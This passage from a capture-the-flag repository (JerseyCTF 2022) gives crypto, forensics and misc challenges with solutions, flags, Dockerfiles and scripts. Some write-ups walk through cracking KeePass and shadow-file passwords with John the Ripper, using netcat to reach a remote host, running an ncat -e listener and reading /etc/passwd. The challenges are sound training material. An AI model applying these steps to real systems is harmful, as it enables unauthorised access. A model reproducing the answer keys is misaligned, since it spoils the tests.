secret_message.txt file. Using the passphrase `manchester_united_2022` to unlock the file. 15 | * Command: steghide extract -sf Photo.jpg 16 | * Flag: `jctf{QbxVLJrIbP}` 17 | 18 | ## Credit 19 | * Developed by [Nishaant Goswamy](https://www.github.com/nishaant215) 20 | -------------------------------------------------------------------------------- /crypto/secret-message/challenge/Photo.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/njitacm/jerseyctf-2022-challenges/393bdc79a7c8bf604e0745c0a89974bbfb6d1a12/crypto/secret-message/challenge/Photo.jpg -------------------------------------------------------------------------------- /crypto/secret-message/challenge/secret_key.txt: -------------------------------------------------------------------------------- 1 | WWxoc3B6YXBqaHNzZiwgZnZiIGR2dSdhIHpsbCBhb3B6IHB1IHlsaHMtZHZ5c2sganlmd2F2bnlod29mLiBEbCd5bCBqdnNzbG5sIHphYmtsdWF6IG9oY3B1biBoIG52dmsgYXB0bCwgenYgcmxsdyBudnB1biBwbSBmdmIgZGh1YSBhb2wgbXNobiEgQW9sIHdoenp3b3loemwgcHogdGh1am9semFseV9idXBhbGtfMjAyMg%3D%3D -------------------------------------------------------------------------------- /crypto/secret-message/sol/Photo.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/njitacm/jerseyctf-2022-challenges/393bdc79a7c8bf604e0745c0a89974bbfb6d1a12/crypto/secret-message/sol/Photo.jpg -------------------------------------------------------------------------------- /crypto/secret-message/sol/secret_key.txt: -------------------------------------------------------------------------------- 1 | WWxoc3B6YXBqaHNzZiwgZnZiIGR2dSdhIHpsbCBhb3B6IHB1IHlsaHMtZHZ5c2sganlmd2F2bnlod29mLiBEbCd5bCBqdnNzbG5sIHphYmtsdWF6IG9oY3B1biBoIG52dmsgYXB0bCwgenYgcmxsdyBudnB1biBwbSBmdmIgZGh1YSBhb2wgbXNobiEgQW9sIHdoenp3b3loemwgcHogdGh1am9semFseV9idXBhbGtfMjAyMg%3D%3D -------------------------------------------------------------------------------- /crypto/secret-message/sol/secret_message.txt: -------------------------------------------------------------------------------- 1 | Amazing you were able to crack the code. Flag: jctf{QbxVLJrIbP} 2 | -------------------------------------------------------------------------------- /crypto/would-you-wordle/README.md: -------------------------------------------------------------------------------- 1 | # would-you-wordle 2 | 3 | ## Challenge Text 4 | * Someone left this secret text string and unfinished Wordle. Can you put them together to get the flag? 5 | * pUpPHg3KfB15MG2KGtQQMDEECPOF8oa3VA== 6 | 7 | ## Hint 8 | * Ron's Code 9 | 10 | ## Solution 11 | * Solve the Wordle to get the Key = "thorn". Use the RC4 cipher (used by WEP) and the Key to decrypt the string. 12 | * Flag: `jctf{CryptoIsTheKeyToFun}` 13 | 14 | ## Credit 15 | * Developed by [Mandy](https://github.com/mrsgcyber) 16 | -------------------------------------------------------------------------------- /crypto/would-you-wordle/challenge/Wordle-Words.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/njitacm/jerseyctf-2022-challenges/393bdc79a7c8bf604e0745c0a89974bbfb6d1a12/crypto/would-you-wordle/challenge/Wordle-Words.jpg -------------------------------------------------------------------------------- /crypto/xoracle/README.md: -------------------------------------------------------------------------------- 1 | # xoracle 2 | 3 | Note: the file [xoracle.py](challenge/xoracle.py) should be provided as part of the challenge, 4 | and it should also be accessible by netcat, running in the same directory as [flag.txt](challenge/flag.txt). 5 | 6 | ## Challenge Text 7 | * Check out my cool new encryption service! It's very secure! Connect to 0.cloud.chals.io on port 19305. 8 | 9 | ## Hint 10 | * Read carefully: a small mistake or typo can be all it takes to make an encryption system insecure. 11 | 12 | ## Solution 13 | 14 | Simple XOR-based crypto challenge 15 | 16 | The program encrypts your input by XORing it with a randomly generated key. 17 | However, it tries to be lazy, and only regenerates the key if you give it an input that's longer than the current key. 18 | Before taking any input, it encrypts the flag and prints out the ciphertext. 19 | If we just give this string directly back to the program, it doesn't regenerate the key, 20 | so it gets encrypted with the same key again. 21 | XOR has a nice property: it's its own inverse; this means that encrypting twice with the same key gives back the original plaintext. 22 | Now, the program gives it to us as a hex string; we just need to convert it back to ASCII text. 23 | This can be done with Python's `binascii.unhexlify` function. 24 | 25 | * Flag: `jctf{1_th0U9hT_1t_w45_53Cure_a07b8a01}` 26 | 27 | ## Credit 28 | * Developed by [ContronThePanda](https://github.com/PAndaContron), part of [RUSEC](https://rusec.github.io/). 29 | -------------------------------------------------------------------------------- /crypto/xoracle/challenge/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ubuntu:latest 2 | 3 | RUN apt update && apt install ncat python3 -y 4 | 5 | COPY flag.txt /root 6 | 7 | COPY xoracle.py /root 8 | 9 | RUN chmod +x /root/xoracle.py 10 | 11 | ENTRYPOINT ncat -nvlp 9999 -e /root/xoracle.py -k 12 | 13 | EXPOSE 9999 14 | 15 | -------------------------------------------------------------------------------- /crypto/xoracle/challenge/flag.txt: -------------------------------------------------------------------------------- 1 | jctf{1_th0U9hT_1t_w45_53Cure_a07b8a01} 2 | -------------------------------------------------------------------------------- /crypto/xoracle/challenge/xoracle.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from os import urandom 4 | from binascii import hexlify, unhexlify 5 | 6 | class Cipher: 7 | def __init__(self): 8 | self.key = b'' 9 | def encrypt(self, data): 10 | if len(data) > len(self.key): 11 | self.key = urandom(len(data)) 12 | return bytes(a ^ b for a, b in zip(data, self.key)) 13 | 14 | cipher = Cipher() 15 | 16 | with open('/root/flag.txt', 'rb') as f: 17 | flag = f.read().strip() 18 | 19 | flag = cipher.encrypt(flag) 20 | flag = hexlify(flag) 21 | 22 | print("Welcome to my SUPER secure encryption service!") 23 | print("To show you just how secure my service is, I'm gonna GIVE you the encrypted version of my flag.") 24 | print("Why? Because I'm CONFIDENT you can't decrypt it.") 25 | print(f"Here it is: {flag}") 26 | print() 27 | print("Now that you've been ensured that my service is SECURE, you should give it a try!") 28 | 29 | while True: 30 | try: 31 | print("Give me some data:") 32 | inp = input() 33 | except: 34 | break 35 | try: 36 | inp = unhexlify(inp) 37 | except: 38 | print("That's not valid!") 39 | continue 40 | ct = cipher.encrypt(inp) 41 | ct = hexlify(ct) 42 | print(f"Here it is: {ct}") 43 | -------------------------------------------------------------------------------- /forensics/README.md: -------------------------------------------------------------------------------- 1 | # Forensics 2 | 3 | ## Easy Challenges 4 | | Challenge Name | Description | Hint 5 | |:-- | :-- | :--- 6 | | [stolen-data](stolen-data) | Someone accessed the server and stole the flag. Use the network packet cature for find it. | Look for unusual ports. 7 | | [speedy-at-midi](speedy-at-midi) | Can you find the right tool to extract the hidden data? | You wouldn't have the audacity to try using a MIDI editor, would you? 8 | 9 | ## Medium Challenges 10 | | Challenge Name | Description | Hint 11 | |:-- | :-- | :--- 12 | | [data-backup](data-backup) | The backup of our data was somehow corrupted. Recover the data and be rewarded with a flag. | Try a tool a surgeon might use. 13 | | [recent-memory](recent-memory) | Use the memory image in the Google drive link below. An attacker left behind some evidence in the network connections. Follow the attacker's tracks to find the flag. https://drive.google.com/drive/folders/1ubSx3pwHOSZ9oCShHBPToVdHjTev7hXL | Try connecting to the attacker's system. 14 | |[scavenger-hunt](scavenger-hunt) | My friend told me he hid a flag for me on this server! Server: 0.cloud.chals.io SSH port: 24052 Username: jersey Password: securepassword | If only there were a way to see all folders... even hidden ones. I wonder where passwords are typically stored on ssh servers? 15 | 16 | 17 | ## Hard Challenges 18 | | Challenge Name | Description | Hint 19 | |:-- | :-- | :--- 20 | | [infected](infected) | A host on the network was infected with a remote access trojan. A memory image of the host can be found here: https://drive.google.com/drive/folders/1YJN9tqjKSIRcYD3Wb4ZH1xo2DlnCuJEB | No hints. 21 | | [corrupted-file](corrupted-file) | Can you find a way to fix our corrupted .jpg file? | No hints. 22 | -------------------------------------------------------------------------------- /forensics/corrupted-file/README.md: -------------------------------------------------------------------------------- 1 | # corrupted-file 2 | 3 | ## Challenge Text 4 | * Can you find a way to fix our corrupted .jpg file? 5 | 6 | ## Hint 7 | * No hints 8 | 9 | ## Solution 10 | * Use a hex editor (https://hexed.it/) and append the missing bytes to the start of the file flag_mod.jpg 11 | * Right click at the top of all the bytes and click **Insert bytes here...** 12 | * Number of bytes is 4 because jpg file signatures usually have 4 bytes at the front of the hexdump. 13 | * FF D8 FF E0 14 | * Save changes and open the file. 15 | * Flag: `jctf{OaZdSdMo8F}` 16 | 17 | ## Credit 18 | * Developed by [Nishaant Goswamy](http://www.github.com/nishaant215) 19 | -------------------------------------------------------------------------------- /forensics/corrupted-file/challenge/flag_mod.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/njitacm/jerseyctf-2022-challenges/393bdc79a7c8bf604e0745c0a89974bbfb6d1a12/forensics/corrupted-file/challenge/flag_mod.jpg -------------------------------------------------------------------------------- /forensics/corrupted-file/solution/flag.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/njitacm/jerseyctf-2022-challenges/393bdc79a7c8bf604e0745c0a89974bbfb6d1a12/forensics/corrupted-file/solution/flag.jpg -------------------------------------------------------------------------------- /forensics/data-backup/README.md: -------------------------------------------------------------------------------- 1 | # data-backup 2 | 3 | ## Challenge Text 4 | * The backup of our data was somehow corrupted. Recover the data and be rewarded with a flag. 5 | 6 | ## Hint 7 | * Try a tool a surgeon might use. 8 | 9 | ## Solution 10 | 11 | * Carve files from corrupted zip 12 | ``` 13 | foremost -i data-backup -o recover 14 | ``` 15 | 16 | * Fix broken zip 17 | ``` 18 | cd recover/zip 19 | ``` 20 | 21 | ``` 22 | zip -FF 00001490.zip --out fixed.zip 23 | ``` 24 | 25 | * Flag is in the PDF file flag.pdf 26 | * Flag: `jctf{fun_w17h_m461c_by735}` 27 | 28 | ## Credit 29 | * Developed by [Rob](https://github.com/njccicrob) 30 | -------------------------------------------------------------------------------- /forensics/data-backup/challenge/data-backup: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/njitacm/jerseyctf-2022-challenges/393bdc79a7c8bf604e0745c0a89974bbfb6d1a12/forensics/data-backup/challenge/data-backup -------------------------------------------------------------------------------- /forensics/infected/README.md: -------------------------------------------------------------------------------- 1 | # infected 2 | 3 | **Challenged by NJCCIC** 4 | 5 | ## Challenge Text 6 | * A host on the network was infected with a remote access trojan. A memory image of the host can be found [here](https://drive.google.com/drive/folders/1YJN9tqjKSIRcYD3Wb4ZH1xo2DlnCuJEB). 7 | * The flag is the process name followed by the PID. Format jctf{processname.exe:1234} 8 | * Backup download: https://drive.google.com/drive/folders/1lFkHr1uDy6nBl9zqA6njsLQVqtoJOG04?usp=sharing 9 | 10 | ## Hint 11 | * No hints 12 | 13 | ## Solution 14 | * A few ways to solve this one. If you list the running processes from the memory image using 'vol -f ~/infected.mem windows.pslist' you will see an svchost.exe process that was launched from cmd.exe which is not normal. svchost.exe with the PID is the flag. 15 | 16 | Another way, you can run 'vol -f ~/infected.mem windows.malfind' which comes back with a few processes that are possibly infected svchost.exe being the correct one. 17 | 18 | 19 | * Flag: `jctf{svchost.exe:7756}` 20 | 21 | ## Credit 22 | * Developed by [Rob Bruder](https://github.com/njccicrob) 23 | -------------------------------------------------------------------------------- /forensics/recent-memory/README.md: -------------------------------------------------------------------------------- 1 | # recent-memory 2 | 3 | ## Challenge Text 4 | * Use the memory image in the Google drive link below. An attacker left behind some evidence in the network connections. Follow the attacker's tracks to find the flag. 5 | 6 | https://drive.google.com/drive/folders/1ubSx3pwHOSZ9oCShHBPToVdHjTev7hXL OR https://drive.google.com/drive/folders/192ELa6W5OZyeWi3DlRd-_TndzN2p_Xz8?usp=sharing 7 | 8 | ## Hint 9 | * Try connecting to the attacker's system. 10 | 11 | ## Solution 12 | * The flag can be obtained two ways. Find the nc.exe session in the memory dump and connect to the same host using netcat. 13 | 14 | vol -f ~/recent-memory.mem windows.netstat 15 | nc -nv 161.35.53.62 5283 16 | 17 | Or you can dump the nc.exe process memory and using strings to find the flag. 18 | 19 | * Flag: `jctf{f0ll0w_7h3_7r41l}` 20 | 21 | ## Credit 22 | * Developed by [Rob Bruder](https://github.com/njccicrob) 23 | -------------------------------------------------------------------------------- /forensics/scavenger-hunt/README.md: -------------------------------------------------------------------------------- 1 | # scavenger-hunt 2 | 3 | ## Challenge Text 4 | * My friend told me he hid a flag for me on this server! Server: 0.cloud.chals.io SSH port: 24052 5 | * Username: jersey 6 | * Password: securepassword 7 | 8 | ## Hint 9 | * If only there were a way to see all folders... even hidden ones 10 | * I wonder where passwords are typically stored on ssh servers 11 | 12 | ## Solution 13 | * Run `ls` to find the `folder` folder in `/home/jersey/jersey` and cd into it 14 | * Run `ls -a` to find the hidden `.secret_folder` folder inside of `folder` and cd into it 15 | * Read the file `flag.txt` inside of `.secret_folder` with cat, which tells you to look at the users and their passwords 16 | * Read `/etc/passwd` using cat and find that the last user is `hey_that_package_is_sus` 17 | * Look through the installed packages (i.e. with the command `apt search flag`) and find the custom package called `notaflag` 18 | * Run `apt info notaflag` to read its description, which directs you to its manual 19 | * Run `man notaflag` to read the man pages and under BUGS is the flag 20 | * Flag: `jctf{f1n4LLy_f0uND_1T}` 21 | 22 | ## Credit 23 | * Developed by Penelope 24 | -------------------------------------------------------------------------------- /forensics/scavenger-hunt/challenge/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ubuntu:20.04 AS build 2 | 3 | RUN apt-get update -y && apt-get install -y gcc 4 | COPY package/ /tmp/build 5 | WORKDIR /tmp/build 6 | 7 | RUN mkdir -p notaflag_1.0-1/usr/local/bin 8 | RUN gcc src.c -o notaflag_1.0-1/usr/local/bin/jersey 9 | RUN chmod 555 notaflag_1.0-1/usr/local/bin/jersey 10 | 11 | RUN gzip notaflag_1.0-1/usr/share/man/man1/notaflag.1 12 | 13 | RUN dpkg-deb --build notaflag_1.0-1 14 | 15 | FROM ubuntu:20.04 16 | 17 | RUN apt update && apt install -y openssh-server 18 | RUN yes | unminimize 19 | RUN mkdir /var/run/sshd 20 | RUN echo 'root:$(< /dev/urandom tr -cd "[:print:]" | head -c 32; echo)' | chpasswd 21 | 22 | RUN sed -i 's/#LogLevel INFO/LogLevel VERBOSE/' /etc/ssh/sshd_config 23 | RUN sed -i 's/#PubkeyAuthentication yes/PubkeyAuthentication no/' /etc/ssh/sshd_config 24 | RUN sed -i 's/X11Forwarding yes/X11Forwarding no/' /etc/ssh/sshd_config 25 | RUN echo "AllowUsers jersey" >> /etc/sshd_config 26 | RUN sed -i 's/session\s*required\s*pam_loginuid.so/session optional pam_loginuid.so/g' /etc/pam.d/sshd 27 | RUN sed -i 's/session\s*optional\s*pam_motd.so/#/g' /etc/pam.d/sshd 28 | 29 | ENV NOTVISIBLE "in users profile" 30 | RUN echo "export VISIBLE=now" >> /etc/profile 31 | 32 | RUN useradd --create-home --shell /bin/bash jersey 33 | RUN echo 'jersey:securepassword' | chpasswd 34 | RUN passwd jersey --mindays 9999 35 | 36 | RUN touch /home/jersey/.hushlogin 37 | RUN chown -R jersey:jersey /home/jersey 38 | RUN chmod -w -R /home/jersey 39 | 40 | WORKDIR /tmp 41 | COPY --from=build /tmp/build/notaflag_1.0-1.deb . 42 | RUN apt install -y man less ./notaflag_1.0-1.deb 43 | RUN rm ./notaflag_1.0-1.deb 44 | 45 | COPY files /home/jersey/jersey 46 | RUN echo "cd /home/jersey/jersey" >> /home/jersey/.bashrc 47 | 48 | RUN chmod -x /usr/bin/ssh* 49 | 50 | RUN useradd --system hey_that_package_is_sus 51 | 52 | EXPOSE 22 53 | CMD ["/usr/sbin/sshd","-D"] 54 | -------------------------------------------------------------------------------- /forensics/scavenger-hunt/challenge/files/folder/.secret_folder/flag.txt: -------------------------------------------------------------------------------- 1 | omg it's the flag! 2 | 3 | jk 4 | but hey i heard there was some fishy business with the users' passwords 5 | maybe give it a look? 6 | -------------------------------------------------------------------------------- /forensics/scavenger-hunt/challenge/package/notaflag_1.0-1/DEBIAN/control: -------------------------------------------------------------------------------- 1 | Package: notaflag 2 | Version: 1.1 3 | Section: misc 4 | Priority: extra 5 | Architecture: amd64 6 | Maintainer: Cool Person 7 | Description: gives you important info about ctfs (but its not a flag) 8 | someone told me to look at my manual. 9 | kinda sus. 10 | -------------------------------------------------------------------------------- /forensics/scavenger-hunt/challenge/package/notaflag_1.0-1/usr/share/man/man1/notaflag.1: -------------------------------------------------------------------------------- 1 | .TH notaflag 1 2 | .SH NAME 3 | notaflag - an application that is sadly, not a flag 4 | .SH SYNOPSIS 5 | .B notaflag 6 | .SH DESCRIPTION 7 | This app is cool. 8 | But it would be cooler if it were a flag 9 | .SH BUGS 10 | .BR notaflag " is not a flag" 11 | .RB " but this is a flag: jctf{f1n4LLy_f0uND_1T}" 12 | .SH AUTHOR 13 | Cool Person 14 | -------------------------------------------------------------------------------- /forensics/scavenger-hunt/challenge/package/src.c: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | int main() 4 | { 5 | setbuf(stdout, NULL); 6 | setbuf(stdin, NULL); 7 | setbuf(stderr, NULL); 8 | 9 | puts("Man this would be really cool if this were a flag."); 10 | puts("Wouldn't this be nice if it were a flag?"); 11 | puts("Tragic."); 12 | } 13 | -------------------------------------------------------------------------------- /forensics/speedy-at-midi/README.md: -------------------------------------------------------------------------------- 1 | # speedy-at-midi 2 | 3 | ## Challenge Text 4 | * Your partner-in-crime gets a hold of a MIDI file, `riff.mid`, which intelligence officials claim to contain confidential information. He has tried opening it in VLC Media Player, but it sounds just like the piano riff in `riff.mp3`. Can you find the right tool to extract the hidden data? 5 | 6 | ## Hint 7 | * You wouldn't have the audacity to try using a MIDI editor, would you? 8 | 9 | ## Solution 10 | * Open up `riff.mid` in [Audacity](https://www.audacityteam.org/), a free and open-source audio editor. 11 | * Zoom and scale the window in order to reveal the hidden MIDI track message. 12 | * The reason why the MIDI track cannot be heard in the `riff.mp3` is that the volume of the track with the hidden message is set to zero. 13 | * You can verify this by playing back using [VLC Media Player](https://www.videolan.org/). 14 | * Flag: `jctf{kicking_it_since_1983}` 15 | 16 | ## Credit 17 | * Developed by [Robert Argasinski](https://github.com/ra536) 18 | -------------------------------------------------------------------------------- /forensics/speedy-at-midi/challenge/riff.mid: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/njitacm/jerseyctf-2022-challenges/393bdc79a7c8bf604e0745c0a89974bbfb6d1a12/forensics/speedy-at-midi/challenge/riff.mid -------------------------------------------------------------------------------- /forensics/speedy-at-midi/challenge/riff.mp3: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/njitacm/jerseyctf-2022-challenges/393bdc79a7c8bf604e0745c0a89974bbfb6d1a12/forensics/speedy-at-midi/challenge/riff.mp3 -------------------------------------------------------------------------------- /forensics/stolen-data/README.md: -------------------------------------------------------------------------------- 1 | # stolen-data 2 | 3 | ## Challenge Text 4 | * Someone accessed the server and stole the flag. Use the network packet capture to find it. 5 | 6 | ## Hint 7 | * Look for unusual ports. 8 | 9 | ## Solution 10 | * Open the pcap with Wireshark. 11 | 12 | * Follow the TCP stream for port 4444 and export the data as raw. 13 | 14 | * Flag is in the PDF file flag.pdf 15 | * Flag: `jctf{0v3r_7h3_w1r3}` 16 | 17 | ## Credit 18 | * Developed by [Rob](https://github.com/njccicrob) 19 | -------------------------------------------------------------------------------- /forensics/stolen-data/challenge/stolen_data.pcap: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/njitacm/jerseyctf-2022-challenges/393bdc79a7c8bf604e0745c0a89974bbfb6d1a12/forensics/stolen-data/challenge/stolen_data.pcap -------------------------------------------------------------------------------- /makeChallenge.py: -------------------------------------------------------------------------------- 1 | """ 2 | filename: makeChallenge.py 3 | Purpose: To automate the creation of challenges on the repository. 4 | Usage: python3 makeChallenge.py 5 | Return(s): 6 | ./ 7 | .//challenge 8 | .//README.md 9 | --> # 10 | """ 11 | 12 | import sys 13 | import os 14 | 15 | def usage(): 16 | print(f"Be sure to have a Challenge Name!") 17 | print(f"Usage:") 18 | print(f"python3 makeChallenge.py ") 19 | 20 | 21 | # Quick Function to make a file 22 | makeFile = lambda file: open(file, "x") 23 | 24 | # main -> Returns a standardized process for a single challenge 25 | def main(challenge_name): 26 | README = f"{challenge_name}/README.md" 27 | 28 | # Creates `./` 29 | os.mkdir(f"{challenge_name}") 30 | 31 | # Creates `.//challenge` 32 | os.mkdir(f"{challenge_name}/challenge") 33 | 34 | # Creates `.//README.md` 35 | makeFile(f"{README}") 36 | 37 | with open(f"{README}", "r+") as f: 38 | f.write(f"# {challenge_name}\n\n") 39 | f.write(f"## Challenge Text\n") 40 | f.write(f"* \n\n") 41 | f.write(f"## Hint\n") 42 | f.write(f"* \n\n") 43 | f.write(f"## Solution\n") 44 | f.write(f"* \n") 45 | f.write(f"* Flag: `jctf{{}}`\n\n") 46 | f.write(f"## Credit\n") 47 | f.write(f"* Developed by [INSERT NAME HERE](INSERT GITHUB PROFILE LINK HERE)") 48 | 49 | # Ensures that users are using the program correctly 50 | if __name__ == "__main__": 51 | try: 52 | challenge_name = sys.argv[1] 53 | main(challenge_name) 54 | except: 55 | usage() 56 | -------------------------------------------------------------------------------- /misc/README.md: -------------------------------------------------------------------------------- 1 | # Misc 2 | 3 | ## Easy Challenges 4 | | Challenge Name | Description | Hint 5 | |:-- | :-- | :--- 6 | | [firewall-rules](firewall-rules) | A network administrator configured a device's firewall, make sure external hosts aren't able to exploit allowed insecure ports. | Sometimes Google searches lead to numbers! 7 | | [snort-log](snort-log) | The company network administrator recently deployed Snort on our network and immediately received 575 alerts in the log file. To put it lightly, every attack out there is infecting the network. | Seems like the extra network traffic is primarily inbound, not outbound. 8 | | [we-will](we-will) | A flag was left behind but it seems to be protected. | The challenge name should help you figure out how to open it. 9 | | [filtered-feeders](filtered-feeders) | The fishing net caught plenty of herrings, but the flag is nowhere to be found! Try to find the flag within the pile of fish. | How do you hide an image within an image? 10 | 11 | ## Medium Challenges 12 | | Challenge Name | Description | Hint 13 | |:-- | :-- | :--- 14 | | [bank-clients](bank-clients) | There was a password-protected client database discovered on a stolen bank computer. | There is a Desktop sticky note that says "wyptbt lza zlwalt". 15 | | [dnsmasq-ip-extract](dnsmasq-ip-extract) | Extract all unique IPs, hash each IP, and write the IP + hash to a text file. | Verify that the end of your file has a new blank line. 16 | | [check-the-shadows](check-the-shadows) | Someone in operations recovered fragments of an important file from 142.93.56.4 when it was undergoing maintenance. | John once said that "any group is only as strong as the weakest link." 17 | 18 | ## Hard Challenges 19 | | Challenge Name | Description | Hint 20 | |:-- | :-- | :--- 21 | | [root-me](root-me) | SSH into the challenge host, 0.cloud.chals.io on port 19777. Username: ubuntu Password: jctf2022! Read the /root/flag.txt file! | No hints. 22 | -------------------------------------------------------------------------------- /misc/bank-clients/README.md: -------------------------------------------------------------------------------- 1 | # bank-clients 2 | 3 | ## Challenge Text 4 | * While in Rome, a few heisters spotted a computer in the dumpster outside of a bank and took it. After brute forcing the computer credentials and getting in with "admin/password", there was a password-protected client database discovered. A Desktop sticky note had the following information: "To fellow bank employee - a way to remember each database PIN is that it is 4-digits ranging between 1000 and 9999". It appears the sticky note was auto-translating from another language as well - let's turn that off. Are you able to assist the heisters from here? 5 | 6 | ## Hint 7 | * After scrolling down, there was additional text on the Desktop sticky note that says "wyptbt lza zlwalt". These bank employees should be removed from the payroll immediately... 8 | 9 | ## Solution 10 | * Utilize the keepass2john John the Ripper tool to get a password hash from the .kdbx file. `keepass2john clients.kdbx > keepassHash.txt` 11 | * Use a [caesar cipher decoder](https://www.dcode.fr/caesar-cipher) on "wyptbt lza zlwalt" to get "primum est septem", which means "the first one is seven" in English after being translated from Latin on Google Translate. Rome is connected to the caesar cipher and also to the Latin language. 12 | * Narrow the PIN list down to the range of 7000-7999 based on this finding. This output list can be made in a simple Python script, but other methods work equally fine. For example: 13 | ``` 14 | for i in range(7000, 7999): 15 | print(i) 16 | ``` 17 | * Type `python3 listScript.py > database-passwords.txt` to send the output to a text file. 18 | * Run John the Ripper on the password hash using the PIN range via `john --wordlist=database-passwords.txt keepassHash.txt` 19 | * Hashcat is also an option 20 | * After a few minutes, PIN: 7182 21 | * Enter 7182 into the KeePass database file and the flag is labeled. 22 | * Flag: `jctf{R1ch_p3rson_#4}` 23 | 24 | ## Credit 25 | * Developed by [Logan](https://github.com/Git-Logan) 26 | -------------------------------------------------------------------------------- /misc/bank-clients/challenge/clients.kdbx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/njitacm/jerseyctf-2022-challenges/393bdc79a7c8bf604e0745c0a89974bbfb6d1a12/misc/bank-clients/challenge/clients.kdbx -------------------------------------------------------------------------------- /misc/check-the-shadows/README.md: -------------------------------------------------------------------------------- 1 | # check-the-shadows 2 | 3 | ## Challenge Text 4 | * Someone in operations recovered fragments of an important file from 142.93.56.4 when it was undergoing maintenance. Intel has it that one of the users has some valuable information. SSH into the server and retrieve it. 5 | 6 | ## Hint 7 | * John once said that "any group is only as strong as the weakest link." 8 | 9 | ## Solution 10 | * Given a shadow file with the many users of an organization, it could take weeks to brute-force all of the passwords, even with a HPC cluster. If a single user has a weak password, the entire system is vulnuerable. 11 | * Use John the Ripper (or Hashcat, or other equivalent) to carry out a dictionary attack on the given shadow file. As soon as a vulnuerable password is found, ssh into the the server using that username and password. 12 | * Start by probing the /home directory to see which users have home folders. 13 | * Then, list all of the files in all of the home folders to notice that many files have a file called `file.txt` in them. 14 | * Search every one of those files using `grep` to see if it contains `jctf` as the flag. 15 | * Some users have a false-flag under their names, but it should be obvious which the true flag is as there is only one flag which is unique. 16 | * Example: User cenmu_vv has the flag, but their password is strong, 8czr702ziyj3ljktdx7a5_fdmwd9vlj. 17 | * John the Ripper found the password for user86, irina, in under a minute. `ssh user86@142.93.56.4`. 18 | * `for folder in /home/*; do ls -l $folder; done` to notice that many users have `file.txt`. 19 | * `for folder in /home/*; do grep 'jctf' $folder/file.txt; done` to find the actual flag. 20 | * Flag: `jctf{o_noes_dicTionarY_atk}` 21 | 22 | ## Credit 23 | * Developed by [SpadeAsInAce](https://github.com/spade-as-in-ace) 24 | -------------------------------------------------------------------------------- /misc/dnsmasq-ip-extract/README.md: -------------------------------------------------------------------------------- 1 | # dnsmasq-ip-extract 2 | 3 | ## Challenge Text 4 | * Extract all **unique** IPs from `dnsmasq-ip-extract-dnsmasq.log`, hash each IP (SHA256), and write the IP + hash to a text file (IP and hash should be separated by a space, and each IP + hash entry should be on a new line). 5 | 6 | **NOTE:** Alphabetical characters in the hash should be lower case, as seen in example below. Otherwise, your flag will be incorrect! 7 | 8 | * Example of text file output contents: 9 | ``` 10 | 10.59.78.165 a6dd519bf8c7c50df5ae519963b5cf1590a471f88343c603168645ff335b26fe 11 | 10.244.220.245 20657ea410e8dd2dbf979a12fea35dd1b94beb6c2cac34f1d49c5824d03de5a1 12 | 10.18.47.24 c0e481d8f55dbb7de078cdcf67ebf627dc371e969e7dbb0b93afcce104e9247e 13 | ``` 14 | 15 | * The flag is the SHA256 hash of the output file. Example: 16 | ``` 17 | jctf{138706baa74bac72c8ee1c42eb3a7c6add2f71c0737c5044dcdd9cba7409ead6} 18 | ``` 19 | 20 | ## Hint 21 | * Verify that the end of your file has a new blank line. 22 | 23 | ## Solution 24 | * Outline: 25 | * Open the log file. 26 | * For this sample dnsmasq log, the IP addresses are at the end of the log line. Extract each IP address using any method (regex, string slicing, etc.) and add it to a list. Don't add new IP addresses to the list if they already exist (deduplication). 27 | * Do not sort the list of IPs, they need to be in the order seen in the logs. 28 | * Loop through the list of unique IP addresses, and calculate the SHA256 hash of each string. 29 | * Create a string consisting of each IP address string and SHA256 hash of same, separated by a single space. 30 | * Output this string to a file, ensuring each string is on a new line. 31 | * Calculate the hash of the file contents once all IP address/hash string have been written to the file. Note that the way the challenge was written, the answer file contains a new line character at the end, which will influence the file hash (and ultimately the flag). I've noted this in the hint. 32 | * The hash of the entire output file is the flag. 33 | 34 | * I have written two solution scripts (PowerShell and Python) which demonstrate the outline above, see these files for details: 35 | * [dnsmasq-ip-extract-solution.ps1](../dnsmasq-ip-extract/sol/solution_scripts/dnsmasq-ip-extract-solution.ps1) 36 | * [dnsmasq-ip-extract-solution.py](../dnsmasq-ip-extract/sol/solution_scripts/dnsmasq-ip-extract-solution.py) 37 | 38 | * Flag: `jctf{90dc97926e09a45aa02ca3a95db387bb00ff83ccff18f4d18a3eb96b4893e8bb}` 39 | 40 | ## Additional Files 41 | * [dnsmasq-ip-extract-challenge-generator.py](../dnsmasq-ip-extract/sol/dnsmasq-ip-extract-challenge-generator.py) 42 | * Script to generate a brand new challenge! Outputs the following: 43 | * A new sample log file (dnsmasq-ip-extract-dnsmasq.log); 44 | * A new answer file (dnsmasq-ip-extract-answer-list.txt); 45 | * A file containing the new challenge flag (dnsmasq-ip-extract-flag.txt). 46 | * [dnsmasq-ip-extract-answer-list.txt](../dnsmasq-ip-extract/sol/dnsmasq-ip-extract-answer-list.txt) 47 | * This is the output a participant's script should generate if completed properly. 48 | * [dnsmasq-ip-extract-flag.txt](../dnsmasq-ip-extract/sol/dnsmasq-ip-extract-flag.txt) 49 | * Contains the challenge flag. 50 | 51 | ## Credit 52 | * Developed by Kevin McKenzie 53 | -------------------------------------------------------------------------------- /misc/dnsmasq-ip-extract/sol/dnsmasq-ip-extract-challenge-generator.py: -------------------------------------------------------------------------------- 1 | from datetime import datetime as dt 2 | from datetime import timedelta 3 | import hashlib 4 | import ipaddress 5 | import random 6 | 7 | #Set number of IPs should be in the answer sheet. 8 | #Larger list will discourage the use of manual tools to accomplish the task. 9 | num_answers = 5000 10 | 11 | #Create files containing dnsmasq log, answer output and flag. 12 | question_file = open("dnsmasq-ip-extract-dnsmasq.log", "w+") 13 | answer_list = open("dnsmasq-ip-extract-answer-list.txt", "w+") 14 | flag_out = open("dnsmasq-ip-extract-flag.txt", "w+") 15 | 16 | #Get all IPs in the 10 private range. 17 | print("Getting private 